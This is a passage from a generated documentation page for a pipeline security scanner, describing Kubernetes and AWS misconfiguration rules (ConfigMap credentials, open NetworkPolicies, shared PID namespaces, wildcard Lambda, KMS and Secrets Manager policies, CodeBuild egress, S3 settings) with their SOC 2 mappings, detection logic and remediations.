Recommendation. Create the missing Kind: Secret of type: kubernetes.io/dockerconfigjson (or dockercfg) in the same namespace before applying the ServiceAccount, or fix the imagePullSecrets reference name. A dangling reference doesn't fail apply, kubelet silently falls back to anonymous registry pulls on every image fetch. Workloads either pull a different image than the operator intended or fail at runtime with ImagePullBackOff after the registry rate-limits the unauthenticated client.
Known false positives.
- Manifests rendered for partial deployment where the secret lives in a parallel manifest set the scanner doesn't see (separate ArgoCD application, Vault-injected, ESO-synced). Add
# pipeline-check: ignore K8S-036or ignore the specific SA name to silence.
Source: K8S-036 in the Kubernetes provider.
K8S-037: ConfigMap data carries a credential-shaped literal HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. Companion to K8S-018 (which scans Kind: Secret). Walks ConfigMap data and binaryData for AKIA-shaped AWS keys and credential-shaped key NAMES. Even when the value is a placeholder, having api_key: REPLACE_ME in a ConfigMap is a maintenance footgun, someone will fill it in and commit. RBAC scoping for configmaps is typically much broader than secrets, so any credential leak via this path reaches a wider audience.
Recommendation. Move the value out of the ConfigMap. Secrets belong in Kind: Secret (better: SealedSecrets, ExternalSecrets / ESO, SOPS-encrypted manifests, or HashiCorp Vault Agent injection). ConfigMaps are intended for non-sensitive config and are mounted into pods without the access controls Secrets carry, the RoleBinding for configmaps:get is typically far broader than the one for secrets:get. A credential in a ConfigMap is effectively unprotected once any pod can read the namespace's config.
Known false positives.
- ConfigMaps that legitimately carry placeholder names (
DEBUG_TOKEN_FORMAT,LICENSE_KEY_HEADER) where the VALUE is a format hint rather than a credential. Rename the key to avoid the credential-shaped name.
Source: K8S-037 in the Kubernetes provider.
K8S-038: NetworkPolicy ingress / egress allows all sources or destinations MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. K8S-032 covers the absence of a default-deny NetworkPolicy. This rule covers the inverse: a NetworkPolicy that exists but contains an ingress: rule with no from: (allow from all) or no ports: filter, or an egress: rule with no to: filter. The from: [] / to: [] shorthand is the canonical mistake. A rule that lists specific peers via podSelector / namespaceSelector / ipBlock passes.
Recommendation. Replace the empty from: [] / to: [] rule with an explicit from: [{podSelector: {matchLabels: {…}}}] or from: [{namespaceSelector: {matchLabels: {…}}}] that names the legitimate peer. An empty from / to peers list means every source / destination, every pod in every namespace, plus every external IP. This is indistinguishable from having no NetworkPolicy at all for the targeted pod, but visually appears to enforce a policy (the false-sense-of-security failure mode is worse than no policy).
Known false positives.
- Policies intentionally allowing world traffic to a public ingress controller pod ({app: nginx-ingress, public: true}). Add
# pipeline-check: ignore K8S-038on the specific NetworkPolicy if the wide-open shape is deliberate.
Source: K8S-038 in the Kubernetes provider.
K8S-039: Pod uses shareProcessNamespace: true MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. shareProcessNamespace: true makes every container in the pod share a single PID namespace. Any container can then enumerate every other container's processes (ps), read their environment variables and CLI args from /proc/<pid>/, send them signals, and (with the right capabilities) ptrace them. A compromised sidecar, debug shell, logging agent, observability exporter, gets a free pivot into every primary container's secrets. The default is false; setting it explicitly to true is the failing shape.
Recommendation. Drop spec.shareProcessNamespace: true from the pod spec. Containers in the pod will go back to having isolated PID namespaces, each sees only its own processes, can't ptrace neighbors, and can't read their /proc/<pid>/environ for env-var-leaked secrets. If the requirement is sidecar-style log collection or process-level cooperation, prefer a sidecar pattern that exchanges data through a shared volume rather than collapsing the namespace.
Known false positives.
- Debug pods that explicitly need
ps/straceacross container boundaries, but those are typically ephemeralContainers attached to a running pod, not long-lived pod specs in a manifest. If a permanent workload genuinely requires it, ignore the rule with a documented justification.
Source: K8S-039 in the Kubernetes provider.
K8S-040: Container securityContext.procMount: Unmasked HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. procMount: Unmasked is rarely needed in practice. It exists for nested-container / KubeVirt scenarios where the container itself runs an inner container runtime that needs to set up its own /proc masking. For an ordinary application container, Unmasked is a runtime-isolation regression that exposes kernel-information paths and writable /proc/sys entries to the workload. Pod Security Standards classify Unmasked as 'restricted'-violating; the rule fires when any container (containers, initContainers, ephemeralContainers) explicitly sets procMount: Unmasked.
Recommendation. Remove securityContext.procMount: Unmasked (or set it explicitly to Default). The default Default procMount type masks several kernel- and node-information paths under /proc (/proc/asound, /proc/acpi, /proc/kcore, /proc/keys, /proc/latency_stats, /proc/timer_list, /proc/timer_stats, /proc/sched_debug, /proc/scsi) and remounts /proc/sys as read-only. These maskings are what stop a container from reading the host's kernel structures or writing to /proc/sys and breaking the kernel out of namespace isolation. Unmasked undoes all of that.
Source: K8S-040 in the Kubernetes provider.
KMS-002: KMS key policy grants wildcard KMS actions HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. kms:* on a key policy is administrative authority over the cipher boundary: CancelKeyDeletion, ScheduleKeyDeletion, ReEncrypt, UpdateKeyDescription, and the data-plane decrypt actions all collapse into one grant. A CI/CD principal almost never needs more than the data-plane subset (Decrypt / GenerateDataKey / Encrypt).
Recommendation. Replace kms:* grants with specific actions needed by the caller (e.g. kms:Decrypt, kms:GenerateDataKey). Key-policy wildcard grants let any holder of the principal re-key, schedule deletion, or export material at will.
Source: KMS-002 in the AWS provider.
LMB-002: Lambda function URL has AuthType=NONE HIGH
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. A Lambda function URL with AuthType=NONE is a public HTTPS endpoint. Anyone who knows the URL can invoke. This is sometimes deliberate (a webhook receiver) but the deliberate version typically signs / validates inside the function, the rule fires regardless because the IAM-side control isn't there.
Recommendation. Set the function URL auth_type to AWS_IAM and grant lambda:InvokeFunctionUrl through IAM. NONE exposes the function to the public internet without authentication.
Source: LMB-002 in the AWS provider.
LMB-004: Lambda resource policy allows wildcard principal CRITICAL
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. A wildcard-principal Allow on a Lambda function resource policy lets anyone invoke. The legitimate case is a service principal (API Gateway, S3 events) where AWS fills in the SourceArn/SourceAccount at invoke time, without those conditions, any account using that service can invoke.
Recommendation. Remove Allow statements with Principal: '*' from every Lambda function resource policy, or scope them with a SourceArn / SourceAccount condition. Service principals (e.g. apigateway.amazonaws.com) are the common legitimate case, ensure they carry a condition.
Source: LMB-004 in the AWS provider.
PBAC-001: CodeBuild project has no VPC configuration HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. A CodeBuild project with no VPC configuration runs in AWS-managed network space, egress to the public internet is unrestricted, every package registry / CDN / arbitrary endpoint is reachable. Inside a VPC, security-group + VPC-endpoint policies become the egress gate, which is the only practical way to limit a compromised build's exfiltration paths.
Recommendation. Configure the CodeBuild project to run inside a VPC with appropriate subnets and security groups. Use a NAT gateway or VPC endpoints to control outbound internet access and restrict build nodes to only the network resources they require.
Source: PBAC-001 in the AWS provider.
PBAC-002: CodeBuild service role shared across multiple projects MEDIUM
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. One CodeBuild service role across many projects means a compromise of any project's build environment grants access to whatever resources every other project's build needs. Per-project roles cap the radius, a backdoor in the foo-tests build can't reach the deploy-prod build's secrets if they each have their own role.
Recommendation. Create a dedicated IAM service role for each CodeBuild project, scoped to only the permissions that specific project requires. This limits the blast radius if one project's build is compromised.
Source: PBAC-002 in the AWS provider.
PBAC-003: CodeBuild security group allows 0.0.0.0/0 all-port egress MEDIUM
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. A security-group egress rule of 0.0.0.0/0 on all ports/protocols means a compromised build can connect to any endpoint on the internet, typosquat-package registry, C2 server, attacker-owned dump endpoint. Even when the build is inside a VPC (PBAC-001), this egress rule negates the network-side gating.
Recommendation. Restrict CodeBuild security-group egress to the specific endpoints builds need (package registries, artifact repositories, STS). A wildcard egress rule lets a compromised build exfiltrate to anywhere on the internet.
Source: PBAC-003 in the AWS provider.
PBAC-005: CodePipeline stage action roles mirror the pipeline role HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. When stage actions don't set their own roleArn, they fall back to the pipeline-level role, which is the union of every stage's needs. A compromise of any one stage (typically the build, which runs untrusted code) gains the deploy stage's authority, including production deploy credentials. Per-action roles cap the radius.
Recommendation. Give each stage action (Source, Build, Deploy) its own narrowly-scoped IAM role via roleArn on the action declaration. Sharing the pipeline-level role means a compromise of one action (e.g. a build) gains the permissions the deploy stage also needs.
Source: PBAC-005 in the AWS provider.
S3-001: Artifact bucket public access block not fully enabled CRITICAL
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. S3 Block Public Access is the bucket-level circuit breaker that supersedes any future ACL or bucket-policy edit. Without all four settings enabled, a misconfigured CloudFormation change or a stray aws s3api call can re-expose the bucket to the public, even if the bucket had previously been private.
Recommendation. Enable all four S3 Block Public Access settings on the artifact bucket: BlockPublicAcls, IgnorePublicAcls, BlockPublicPolicy, and RestrictPublicBuckets.
Source: S3-001 in the AWS provider.
S3-003: Artifact bucket versioning not enabled MEDIUM
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. Versioning makes overwrites and deletes recoverable: the previous content of an object survives until lifecycle expires it. Without versioning, an artifact overwrite (a bad pipeline run, a malicious replacement, a typo'd aws s3 cp) is unrecoverable, the original bytes are gone.
Recommendation. Enable S3 versioning on the artifact bucket so that previous artifact versions are retained and rollback is possible. Combine with a lifecycle rule to expire old versions after a retention period.
Source: S3-003 in the AWS provider.
S3-004: Artifact bucket access logging not enabled LOW
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. S3 server access logging records every API operation against the bucket, who, when, what object, what method. CloudTrail data events overlap but cost more; access logs are the cheap baseline. Without them, an exfiltration via GetObject doesn't leave a trail you can investigate.
Recommendation. Enable S3 server access logging for the artifact bucket and direct logs to a separate, centralized logging bucket with restricted write access.
Source: S3-004 in the AWS provider.
S3-005: Artifact bucket missing aws:SecureTransport deny MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary, CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. S3 endpoints accept HTTP and HTTPS by default. Without an explicit Deny on aws:SecureTransport=false, a plaintext request, typically from a misconfigured client or a SDK with a stale endpoint, is honored if signed. The bucket policy Deny is the only enforcement; no account-level switch covers it.
Recommendation. Add a Deny statement for s3:* with Bool aws:SecureTransport=false.
Source: S3-005 in the AWS provider.
SIGN-001: No AWS Signer profile defined for Lambda deploys MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. AWS Signer profiles are the upstream of LMB-001's code-signing config. Without a profile defined, no function in the account can enforce code-signing, LMB-001's recommendation has nothing to point at. The profile is the foundation; the per-function code-signing config attaches it.
Recommendation. Create an AWS Signer profile with platform AWSLambda-SHA384-ECDSA and reference it from every Lambda code-signing config used by the pipeline. Without a profile, LMB-001 remediation isn't possible and release artifacts can't be signed at build time.
Source: SIGN-001 in the AWS provider.
SIGN-002: AWS Signer profile is revoked or inactive HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. A revoked or canceled Signer profile invalidates every signature it ever produced. Lambda functions configured to enforce code-signing fail to deploy until the profile is replaced (or, if UntrustedArtifactOnDeployment = Warn, deploy with a CloudWatch warning the operator rarely reads).
Recommendation. Rotate the signing profile: create a replacement and update every code-signing config that references the revoked profile. A revoked or canceled profile invalidates every signature it produced, lambdas relying on it will fail verification.
Source: SIGN-002 in the AWS provider.
SM-002: Secrets Manager resource policy allows wildcard principal CRITICAL
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. A wildcard-principal Allow on a Secrets Manager resource policy means any principal in any AWS account can call GetSecretValue (subject to conditions, if any). Always combine with at least aws:SourceAccount or aws:PrincipalOrgID, the lift-and-shift cross-account secret-access pattern needs scoping.
Recommendation. Remove Allow statements whose Principal is * from every Secrets Manager resource policy, or scope them with a Condition restricting the source account/org (aws:PrincipalOrgID). A wildcard-principal policy allows any AWS account to call GetSecretValue on the secret.
Source: SM-002 in the AWS provider.
This page is generated. Edit pipeline_check/core/standards/data/soc2.py (mappings) or scripts/gen_standards_docs.py (intro / per-control prose) and run python scripts/gen_standards_docs.py soc2.